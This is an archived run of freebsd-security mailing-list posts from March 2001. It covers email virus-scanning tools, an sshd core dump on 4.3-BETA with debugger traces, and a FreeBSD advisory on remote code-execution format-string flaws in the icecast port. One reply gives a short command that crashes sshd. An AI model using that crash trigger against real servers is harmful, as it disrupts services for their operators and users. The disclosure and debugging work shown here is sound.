In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Message-ID: <Pine.BSF.4.33.0103121706140.71866-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Take a look at amavis-perl-10, inflex-0.1.5.c, and uvscan-4.07e.
They are in the ports collection.
uvscan-4.07e is an eval and you have to pay for it eventually, but there
aren't any opensource scanning engines that I know of. The other two are
interfaces for something like uvscan-4.07e.
Robert Simmons
Systems Administrator
http://www.wlcg.com/
On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don;t trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>
> Regards,
> Mit
>
> --
> Will Mitayai Keeso Rowe
>
> For full contact information, please visit:
> http://my.infotriever.com/mitayai
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rUj9v8Bofna59hYRAjq+AJ9Wbc5o0Znrjx8RPcVybyEogUr7wwCeM/md
I49PRXYh8iBIjAAgxgmXrp0=
=Hp2V
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14:11: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3])
by hub.freebsd.org (Postfix) with ESMTP id B3B7E37B71B
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:10:53 -0800 (PST)
(envelope-from newton@atdot.dotat.org)
Received: (from newton@localhost)
by atdot.dotat.org (8.11.0/8.9.3) id f2CMMeq24143;
Tue, 13 Mar 2001 08:52:40 +1030 (CST)
(envelope-from newton)
Date: Tue, 13 Mar 2001 08:52:40 +1030
From: Mark Newton <newton@atdot.dotat.org>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
Message-ID: <20010313085240.A24044@atdot.dotat.org>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>; from mit@mitayai.net on Mon, Mar 12, 2001 at 04:56:43PM -0500
X-PGP-Key: http://slash.dotat.org/~newton/pgpkey.txt
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, Mar 12, 2001 at 04:56:43PM -0500, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don;t trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
There's a sourceforge project called AMaViS - http://www.amavis.org
We're using it at work; It seems to do the right thing.
- mark
--------------------------------------------------------------------
I tried an internal modem, newton@atdot.dotat.org
but it hurt when I walked. Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14:34:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from slip-3.slip.net (slip-3.slip.net [207.171.193.17])
by hub.freebsd.org (Postfix) with ESMTP id D281837B729
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:34:12 -0800 (PST)
(envelope-from cshishid@slip.net)
Received: from cshishid by slip-3.slip.net with local (Exim 2.02 #1)
id 14cat0-0001d8-00; Mon, 12 Mar 2001 14:33:54 -0800
Subject: Re: Virus Scanning Software for FreeBSD
To: mit@mitayai.net (Will Mitayai Keeso Rowe)
Date: Mon, 12 Mar 2001 14:33:53 -0800 (PST)
Cc: freebsd-security@freebsd.org
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net> from "Will Mitayai Keeso Rowe" at Mar 12, 2001 04:56:43 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <E14cat0-0001d8-00@slip-3.slip.net>
From: Clark Shishido <cshishid@slip.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don;t trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>
I use this procmail filter to protect myself from all kinds of malicious
content, not just known trojans or virii.
http://www.impsec.org/email-tools/procmail-security.html
it'll protect you and your mail from all those *.vbs worms out there
and those yet to be discovered.
--clark
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14:40: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id A184337B71A
for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 14:39:56 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id XAA43640;
Mon, 12 Mar 2001 23:39:54 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: Spades <spades@galaxynet.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rebooting error
References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 12 Mar 2001 23:39:54 +0100
In-Reply-To: Spades's message of "Mon, 12 Mar 2001 18:14:08 +0800"
Message-ID: <xzpitlevcg5.fsf@flood.ping.uio.no>
Lines: 11
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Spades <spades@galaxynet.org> writes:
> What kinda error gives this?
Please show me the output of:
1) uname -a
2) nm $(sysctl -n kern.bootfile) | grep \^c0309 | sort
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14:48:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227])
by hub.freebsd.org (Postfix) with SMTP id 94D3537B719
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:48:16 -0800 (PST)
(envelope-from razor@ldc.ro)
Received: (qmail 78324 invoked by uid 666); 12 Mar 2001 22:48:13 -0000
Date: Tue, 13 Mar 2001 00:48:13 +0200
From: Alex Popa <razor@ldc.ro>
To: freebsd-security@freebsd.org
Cc: freebsd-stable@freebsd.org
Subject: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I am not really sure what this means (could mean a lot of things,
including bad memory on my machine), but here are the facts:
The system was cvsupped and compiled on March 10th.
$ uname -a
FreeBSD ns.ldc.ro 4.3-BETA FreeBSD 4.3-BETA #0: Sat Mar 10 15:16:38 EET 2001 root@ns.ldc.ro:/usr/src/sys/compile/NS i386
$ ls -l /sshd.core
-rw------- 1 root wheel 507904 Mar 12 16:40 /sshd.core
$ ls -l /usr/sbin/sshd
-r-xr-xr-x 1 root wheel 196532 Mar 10 16:07 /usr/sbin/sshd
# gdb /usr/sbin/sshd /sshd.core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libopie.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libcrypto.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libz.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libwrap.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...
done.
---Type <return> to continue, or q <return> to quit---
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)...
done.
#0 0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3
(gdb) bt
#0 0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3
#1 0x80532e8 in getsockname ()
#2 0x805a9ef in getsockname ()
#3 0x8052fd0 in getsockname ()
#4 0x804d81d in getsockname ()
#5 0x804be95 in getsockname ()
(gdb)
$ ident /usr/sbin/sshd
/usr/sbin/sshd:
$OpenBSD: sshd.c,v 1.132 2000/10/13 18:34:46 markus Exp $
$FreeBSD: src/crypto/openssh/sshd.c,v 1.6.2.7 2001/03/04 15:13:08 markm Exp $
$OpenBSD: auth-rhosts.c,v 1.16 2000/10/03 18:03:03 markus Exp $
$OpenBSD: auth-passwd.c,v 1.18 2000/10/03 18:03:03 markus Exp $
$FreeBSD: src/crypto/openssh/auth-passwd.c,v 1.2.2.4 2001/03/04 15:13:08 markm Exp $
$OpenBSD: auth-rsa.c,v 1.32 2000/10/14 12:19:45 markus Exp $
$FreeBSD: src/crypto/openssh/auth-rsa.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $
$OpenBSD: auth-rh-rsa.c,v 1.17 2000/10/03 18:03:03 markus Exp $
$FreeBSD: src/crypto/openssh/auth-rh-rsa.c,v 1.1.1.1.2.3 2001/01/12 04:25:55 green Exp $
$OpenBSD: pty.c,v 1.16 2000/09/07 21:13:37 markus Exp $
$FreeBSD: src/crypto/openssh/pty.c,v 1.2.2.2 2000/10/28 23:00:49 kris Exp $
$OpenBSD: log-server.c,v 1.17 2000/09/12 20:53:10 markus Exp $
$OpenBSD: login.c,v 1.15 2000/09/07 20:27:52 deraadt Exp $
$FreeBSD: src/crypto/openssh/login.c,v 1.3.2.2 2000/10/28 23:00:48 kris Exp $
$OpenBSD: servconf.c,v 1.53 2000/10/14 12:12:09 markus Exp $
$FreeBSD: src/crypto/openssh/servconf.c,v 1.3.2.10 2001/03/04 15:13:08 markm Exp $
$OpenBSD: serverloop.c,v 1.34 2000/10/27 07:32:18 markus Exp $
$OpenBSD: auth.c,v 1.11 2000/10/11 20:27:23 markus Exp $
$FreeBSD: src/crypto/openssh/auth.c,v 1.3.2.3 2001/01/12 04:25:55 green Exp $
$OpenBSD: auth1.c,v 1.6 2000/10/11 20:27:23 markus Exp $
$FreeBSD: src/crypto/openssh/auth1.c,v 1.3.2.5 2001/03/04 15:13:08 markm Exp $
$OpenBSD: auth2.c,v 1.20 2000/10/14 12:16:56 markus Exp $
$FreeBSD: src/crypto/openssh/auth2.c,v 1.2.2.5 2001/03/04 15:13:08 markm Exp $
$OpenBSD: auth-options.c,v 1.5 2000/10/09 21:32:34 markus Exp $
$OpenBSD: session.c,v 1.42 2000/10/27 07:32:18 markus Exp $
$FreeBSD: src/crypto/openssh/session.c,v 1.4.2.7 2001/02/04 20:21:06 green Exp $
$OpenBSD: dh.c,v 1.2 2000/10/11 20:11:35 markus Exp $
$FreeBSD: src/crypto/openssh/auth-pam.c,v 1.2.2.1 2001/01/12 04:25:54 green Exp $
$FreeBSD: src/crypto/openssh/auth2-skey.c,v 1.2.2.1 2001/01/12 04:25:55 green Exp $
$OpenBSD: auth2-skey.c,v 1.1 2000/10/11 20:14:38 markus Exp $
$OpenBSD: auth-skey.c,v 1.9 2000/10/19 16:41:13 deraadt Exp $
$FreeBSD: src/crypto/openssh/auth-skey.c,v 1.1.1.1.2.4 2001/01/12 04:25:55 green Exp $
$OpenBSD: kex.c,v 1.12 2000/10/11 20:27:23 markus Exp $
$OpenBSD: dispatch.c,v 1.5 2000/09/21 11:25:34 markus Exp $
$OpenBSD: ttymodes.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $
$OpenBSD: tildexpand.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $
$OpenBSD: rsa.c,v 1.16 2000/09/07 20:27:53 deraadt Exp $
$FreeBSD: src/crypto/openssh/rsa.c,v 1.1.1.1.2.6 2001/02/12 06:45:42 kris Exp $
$OpenBSD: readpass.c,v 1.12 2000/10/11 20:14:39 markus Exp $
$OpenBSD: mpaux.c,v 1.14 2000/09/07 20:27:52 deraadt Exp $
$FreeBSD: src/crypto/openssh/mpaux.c,v 1.2.2.2 2000/10/28 23:00:48 kris Exp $
$OpenBSD: hostfile.c,v 1.20 2000/09/07 20:27:51 deraadt Exp $
$FreeBSD: src/crypto/openssh/hostfile.c,v 1.1.1.1.2.2 2000/10/28 23:00:48 kris Exp $
$OpenBSD: authfile.c,v 1.20 2000/10/11 20:27:23 markus Exp $
$FreeBSD: src/crypto/openssh/authfile.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $
$OpenBSD: cli.c,v 1.2 2000/10/16 09:38:44 djm Exp $
$OpenBSD: match.c,v 1.9 2000/09/07 20:27:52 deraadt Exp $
$OpenBSD: dsa.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $
$OpenBSD: xmalloc.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $
$OpenBSD: packet.c,v 1.38 2000/10/12 14:21:12 markus Exp $
$OpenBSD: hmac.c,v 1.4 2000/09/07 20:27:51 deraadt Exp $
$OpenBSD: crc32.c,v 1.7 2000/09/07 20:27:51 deraadt Exp $
$OpenBSD: compress.c,v 1.9 2000/09/07 20:27:50 deraadt Exp $
$OpenBSD: cipher.c,v 1.37 2000/10/23 19:31:54 markus Exp $
$FreeBSD: src/crypto/openssh/cipher.c,v 1.2.2.3 2001/01/12 04:25:56 green Exp $
$OpenBSD: nchan.c,v 1.19 2000/09/07 20:27:52 deraadt Exp $
$OpenBSD: channels.c,v 1.72 2000/10/27 07:48:22 markus Exp $
$OpenBSD: canohost.c,v 1.16 2000/10/21 17:04:22 markus Exp $
$FreeBSD: src/crypto/openssh/canohost.c,v 1.1.1.1.2.4 2001/01/12 04:25:56 green Exp $
$OpenBSD: authfd.c,v 1.29 2000/10/09 21:51:00 markus Exp $
$FreeBSD: src/crypto/openssh/authfd.c,v 1.2.2.4 2001/01/12 04:25:55 green Exp $
$OpenBSD: util.c,v 1.6 2000/10/27 07:32:19 markus Exp $
$OpenBSD: key.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $
$FreeBSD: src/crypto/openssh/key.c,v 1.4.2.2 2000/10/28 23:00:48 kris Exp $
$OpenBSD: atomicio.c,v 1.7 2000/10/18 18:04:02 markus Exp $
$OpenBSD: uidswap.c,v 1.9 2000/09/07 20:27:55 deraadt Exp $
$FreeBSD: src/crypto/openssh/compat.c,v 1.1.1.1.2.3 2001/01/12 04:25:56 green Exp $
$OpenBSD: compat.c,v 1.27 2000/10/31 09:31:58 markus Exp $
$OpenBSD: bufaux.c,v 1.13 2000/09/07 20:27:50 deraadt Exp $
$FreeBSD: src/crypto/openssh/bufaux.c,v 1.2.2.2 2000/10/28 23:00:47 kris Exp $
$OpenBSD: uuencode.c,v 1.7 2000/09/07 20:27:55 deraadt Exp $
$OpenBSD: buffer.c,v 1.8 2000/09/07 20:27:50 deraadt Exp $
$OpenBSD: log.c,v 1.11 2000/09/30 16:27:43 markus Exp $
/var/log/all.log has this on the incident:
Mar 12 16:40:01 ns sshd[76406]: input_userauth_request: illegal user hodo
Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)
Mar 12 16:40:03 ns /kernel: Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)
From the output of "strings /sshd.core" I can see the server was doing
some pretty normal activity, like rejecting a user I know, that had an
account on another machine, but not this one.
If there is more information needed, I will try to provide it.
Thank you for listening and not panicking.
------------+------------------------------------------
Alex Popa, | "Artificial Intelligence is
razor@ldc.ro| no match for Natural Stupidity"
------------+------------------------------------------
"It took the computing power of three C-64s to fly to the Moon.
It takes a 486 to run Windows 95. Something is wrong here."
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 14:58:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75])
by hub.freebsd.org (Postfix) with ESMTP id 2234C37B718
for <security@freebsd.org>; Mon, 12 Mar 2001 14:58:09 -0800 (PST)
(envelope-from brdavis@odin.ac.hmc.edu)
Received: (from brdavis@localhost)
by odin.ac.hmc.edu (8.11.0/8.11.0) id f2CMvsO01383;
Mon, 12 Mar 2001 14:57:54 -0800
Date: Mon, 12 Mar 2001 14:57:54 -0800
From: Brooks Davis <brooks@one-eyed-alien.net>
To: Alex Popa <razor@ldc.ro>
Cc: security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010312145754.A489@Odin.AC.HMC.Edu>
References: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB"
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <20010313004813.A78221@ldc.ro>; from razor@ldc.ro on Tue, Mar 13, 2001 at 12:48:13AM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--DocE+STaALJfprDB
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> I am not really sure what this means (could mean a lot of things,=20
> including bad memory on my machine), but here are the facts:
This reminds me of something I noticed during the last discussion of
ssh I got involved in and compleatly forgot about. If you create an
account with a bad shell (say, /bin/false) and run the following command
you get an immediate sshd core dump:
ssh -t xxx@localhost /bin/sh
Attempting to run gdb on the core appears to show that I'm in:
#0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3
but the binary is stripped so I don't know and my /usr/obj is out of
sync with my world at the moment so I figure running gdb against the
unstripped binary is not productive.
-- Brooks
--=20
Any statement of the form "X is the one, true Y" is FALSE.
PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4
--DocE+STaALJfprDB
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE6rVRxXY6L6fI4GtQRAg+kAJ4vCmuI9LwU1SYhc+P4giz+WKJhQQCguZSX
NyC1bmupNaEBEMJH1y4nmB8=
=akX/
-----END PGP SIGNATURE-----
--DocE+STaALJfprDB--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15: 2: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
by hub.freebsd.org (Postfix) with ESMTP
id 780A437B719; Mon, 12 Mar 2001 15:02:03 -0800 (PST)
(envelope-from mike@sentex.net)
Received: from chimp (fcage [192.168.0.2])
by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2CN1Yg55899;
Mon, 12 Mar 2001 18:01:40 -0500 (EST)
(envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010312180009.02c135a8@marble.sentex.net>
X-Sender: mdtancsa@marble.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Mon, 12 Mar 2001 18:01:33 -0500
To: Alex Popa <razor@ldc.ro>, freebsd-security@FreeBSD.ORG
From: Mike Tancsa <mike@sentex.net>
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Cc: freebsd-stable@FreeBSD.ORG
In-Reply-To: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
At 12:48 AM 3/13/2001 +0200, Alex Popa wrote:
>I am not really sure what this means (could mean a lot of things,
>including bad memory on my machine), but here are the facts:
>
>The system was cvsupped and compiled on March 10th.
There is an open PR about this.
http://www.freebsd.org/cgi/query-pr.cgi?pr=25722
I wonder if its exploitable ?
---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15:22:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59])
by hub.freebsd.org (Postfix) with ESMTP id 520E037B71A
for <security@FreeBSD.ORG>; Mon, 12 Mar 2001 15:22:16 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 0A29266B6C; Mon, 12 Mar 2001 15:22:15 -0800 (PST)
Date: Mon, 12 Mar 2001 15:22:15 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Brooks Davis <brooks@one-eyed-alien.net>
Cc: Alex Popa <razor@ldc.ro>, security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010312152215.A94640@mollari.cthul.hu>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="Nq2Wo0NMKNjxTN9z"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010312145754.A489@Odin.AC.HMC.Edu>; from brooks@one-eyed-alien.net on Mon, Mar 12, 2001 at 02:57:54PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--Nq2Wo0NMKNjxTN9z
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote:
> On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> > I am not really sure what this means (could mean a lot of things,=20
> > including bad memory on my machine), but here are the facts:
>=20
> This reminds me of something I noticed during the last discussion of
> ssh I got involved in and compleatly forgot about. If you create an
> account with a bad shell (say, /bin/false) and run the following command
> you get an immediate sshd core dump:
>=20
> ssh -t xxx@localhost /bin/sh
>=20
> Attempting to run gdb on the core appears to show that I'm in:
>=20
> #0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3
>=20
> but the binary is stripped so I don't know and my /usr/obj is out of
> sync with my world at the moment so I figure running gdb against the
> unstripped binary is not productive.
There's a PR open about this and Brian is looking into it -
indications are it's a simple bug and not a security problem, denial
of service or otherwise.
Kris
--Nq2Wo0NMKNjxTN9z
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rVonWry0BWjoQKURAgsqAJ9O7Nv5bFkBfhRjEo8OgB34JWgFGwCfULJ8
i6pGoR04IEwGi8EtywY58XU=
=7bZh
-----END PGP SIGNATURE-----
--Nq2Wo0NMKNjxTN9z--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15:31:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
by hub.freebsd.org (Postfix) with ESMTP
id A965B37B71A; Mon, 12 Mar 2001 15:31:37 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
by freefall.freebsd.org (8.11.1/8.11.1) id f2CNVb526130;
Mon, 12 Mar 2001 15:31:37 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:31:37 -0800 (PST)
Message-Id: <200103122331.f2CNVb526130@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:23.icecast
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-01:23 Security Advisory
FreeBSD, Inc.
Topic: icecast port contains remote vulnerability
Category: ports
Module: icecast
Announced: 2001-03-12
Credits: |CyRaX| <cyrax@pkcrew.org>
Affects: Ports collection prior to the correction date.
Corrected: 2001-03-10
Vendor status: Unresponsive
FreeBSD only: NO
I. Background
icecast is a server for streaming MP3 audio.
II. Problem Description
The icecast software, versions prior to 1.3.7_1, contains multiple
format string vulnerabilities, which allow a remote attacker to
execute arbitrary code as the user running icecast, usually the root
user.
There are a number of other potential abuses of format strings which
may or may not pose security risks, but have not currently been
audited.
The icecast port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains nearly 4700 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.
FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.
III. Impact
Arbitrary remote users can execute arbitrary code on the local system
as the user running icecast, usually the root user.
If you have not chosen to install the icecast port/package, then your
system is not vulnerable to this problem.
IV. Workaround
Deinstall the icecast port/package, if you have installed it.
V. Solution
Consider running the icecast software as a non-privileged user to
minimize the impact of further security vulnerabilities in this
software.
To upgrade icecast, choose one of the following options:
1) Upgrade your entire ports collection and rebuild the icecast port.
2) Deinstall the old package and install a new package dated after the
correction date, obtained from:
[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/icecast-1.3.7_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/icecast-1.3.7_1.tgz
NOTE: It may be several days before updated packages are available
[alpha]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/icecast-1.3.7_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/icecast-1.3.7_1.tgz
3) download a new port skeleton for the icecast port from:
http://www.freebsd.org/ports/
and use it to rebuild the port.
4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iQCVAwUBOq1b9lUuHi5z0oilAQF0VQQAgjsvLSPtZ1pu6OtkGxuMJhCmmeCvFJvL
4szsF1csrFrXhaH7z1VjJP8r/Q2NBzWcS3qujkhGRObsGGyvAJKk7QVrqnjXV3gD
rgLnphjNlKt0VuXafxXwTT8YTxoCbzOHy23aa0KaRWoCAVcVi4AAZs4XHEUgU+Ov
lWOyEgxUBEk=
=WM3Y
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15:35:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
by hub.freebsd.org (Postfix) with ESMTP
id A503837B718; Mon, 12 Mar 2001 15:34:53 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
by freefall.freebsd.org (8.11.1/8.11.1) id f2CNYrJ26352;
Mon, 12 Mar 2001 15:34:53 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:34:53 -0800 (PST)
Message-Id: <200103122334.f2CNYrJ26352@freefall.freebsd.org>
